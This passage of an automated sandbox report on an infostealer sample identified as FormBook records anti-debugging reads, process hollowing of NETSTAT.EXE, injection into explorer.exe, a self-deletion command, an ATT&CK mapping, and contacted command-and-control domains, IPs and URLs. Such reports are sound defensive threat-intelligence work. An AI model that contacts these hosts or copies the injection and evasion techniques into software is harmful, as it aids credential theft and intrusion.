Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03253D43 mov eax, dword ptr fs:[00000030h]	9_2_03253D43
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03293540 mov eax, dword ptr fs:[00000030h]	9_2_03293540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032C3D40 mov eax, dword ptr fs:[00000030h]	9_2_032C3D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03237D50 mov eax, dword ptr fs:[00000030h]	9_2_03237D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]	9_2_032E05AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]	9_2_032E05AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032435A1 mov eax, dword ptr fs:[00000030h]	9_2_032435A1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]	9_2_03241DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]	9_2_03241DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]	9_2_03241DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]	9_2_03242581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]	9_2_03242581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]	9_2_03242581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]	9_2_03242581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]	9_2_03212D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]	9_2_03212D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]	9_2_03212D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]	9_2_03212D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]	9_2_03212D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]	9_2_0324FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]	9_2_0324FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0322D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0322D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]	9_2_032DFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]	9_2_032DFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]	9_2_032DFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]	9_2_032DFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032C8DF1 mov eax, dword ptr fs:[00000030h]	9_2_032C8DF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov ecx, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]	9_2_03296DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324BC2C mov eax, dword ptr fs:[00000030h]	9_2_0324BC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]	9_2_032E740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]	9_2_032E740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]	9_2_032E740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]	9_2_03296C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]	9_2_03296C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]	9_2_03296C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]	9_2_03296C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]	9_2_032D1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323746D mov eax, dword ptr fs:[00000030h]	9_2_0323746D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A44B mov eax, dword ptr fs:[00000030h]	9_2_0324A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]	9_2_032AC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]	9_2_032AC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322849B mov eax, dword ptr fs:[00000030h]	9_2_0322849B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D14FB mov eax, dword ptr fs:[00000030h]	9_2_032D14FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]	9_2_03296CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]	9_2_03296CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]	9_2_03296CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8CD6 mov eax, dword ptr fs:[00000030h]	9_2_032E8CD6

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 1_2_00409B50 LdrLoadDll,

1_2_00409B50

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_1000EDD1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_1000EDD1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.webartsolution.net
Source: C:\Windows\explorer.exe	Network Connect: 185.65.236.168 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe	Domain query: www.gadget198.xyz
Source: C:\Windows\explorer.exe	Domain query: www.intelldat.com
Source: C:\Windows\explorer.exe	Network Connect: 3.96.23.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.helpfromjames.com
Source: C:\Windows\explorer.exe	Network Connect: 172.67.158.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.le-hameau-enchanteur.com
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Network Connect: 198.54.125.56 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.139.128.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yesrecompensas.lat
Source: C:\Windows\explorer.exe	Domain query: www.henleygirlscricket.com
Source: C:\Windows\explorer.exe	Network Connect: 143.95.80.65 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: EA0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: unknown protection: read write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Memory written: C:\Users\user\Desktop\TT COPY_02101011.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3424			Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"			Jump to behavior

Source: explorer.exe, 00000004.00000000.683168354.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.704124995.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.721487248.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.709424798.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.729403220.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.692880282.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_10010DF5 cpuid

0_2_10010DF5

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_0040594D

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion2	OS Credential Dumping	Security Software Discovery251	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection612	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	System Network Connections Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery113	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TT COPY_02101011.exe	36%	Virustotal		Browse
TT COPY_02101011.exe	16%	ReversingLabs	Win32.Trojan.Nemesis

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll	16%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.TT COPY_02101011.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.1.TT COPY_02101011.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.TT COPY_02101011.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.TT COPY_02101011.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
0.2.TT COPY_02101011.exe.2a30000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.NETSTAT.EXE.372796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.TT COPY_02101011.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.NETSTAT.EXE.d6e840.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.0.TT COPY_02101011.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.le-hameau-enchanteur.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
www.helpfromjames.com/e8ia/	0%	Avira URL Cloud	safe
http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe
http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe
http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe
http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe
http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe
http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.le-hameau-enchanteur.com	213.186.33.5	true	true	1%, Virustotal, Browse	unknown
www.blttsperma.quest	37.123.118.150	true	true		unknown
www.bestinvest-4-you.com	104.21.31.204	true	true		unknown
helpfromjames.com	185.65.236.168	true	true		unknown
webartsolution.net	198.54.125.56	true	true		unknown
www.yesrecompensas.lat	3.96.23.237	true	true		unknown
www.gadget198.xyz	172.67.158.42	true	true		unknown
w2y6q8s9.stackpathcdn.com	151.139.128.11	true	true		unknown
intelldat.com	143.95.80.65	true	true		unknown
wss.easycompanies.com.au	13.210.99.21	true	false		unknown
www.weprepareamerica-planet.com	208.91.197.27	true	false		unknown
www.webartsolution.net	unknown	unknown	true		unknown
www.mcclureic.xyz	unknown	unknown	true		unknown
www.henleygirlscricket.com	unknown	unknown	true		unknown
www.intelldat.com	unknown	unknown	true		unknown
www.dandftrading.com	unknown	unknown	true		unknown
www.helpfromjames.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.helpfromjames.com/e8ia/	true	Avira URL Cloud: safe	low
http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown
http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown
http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown
http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown
http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown
http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	TT COPY_02101011.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	TT COPY_02101011.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

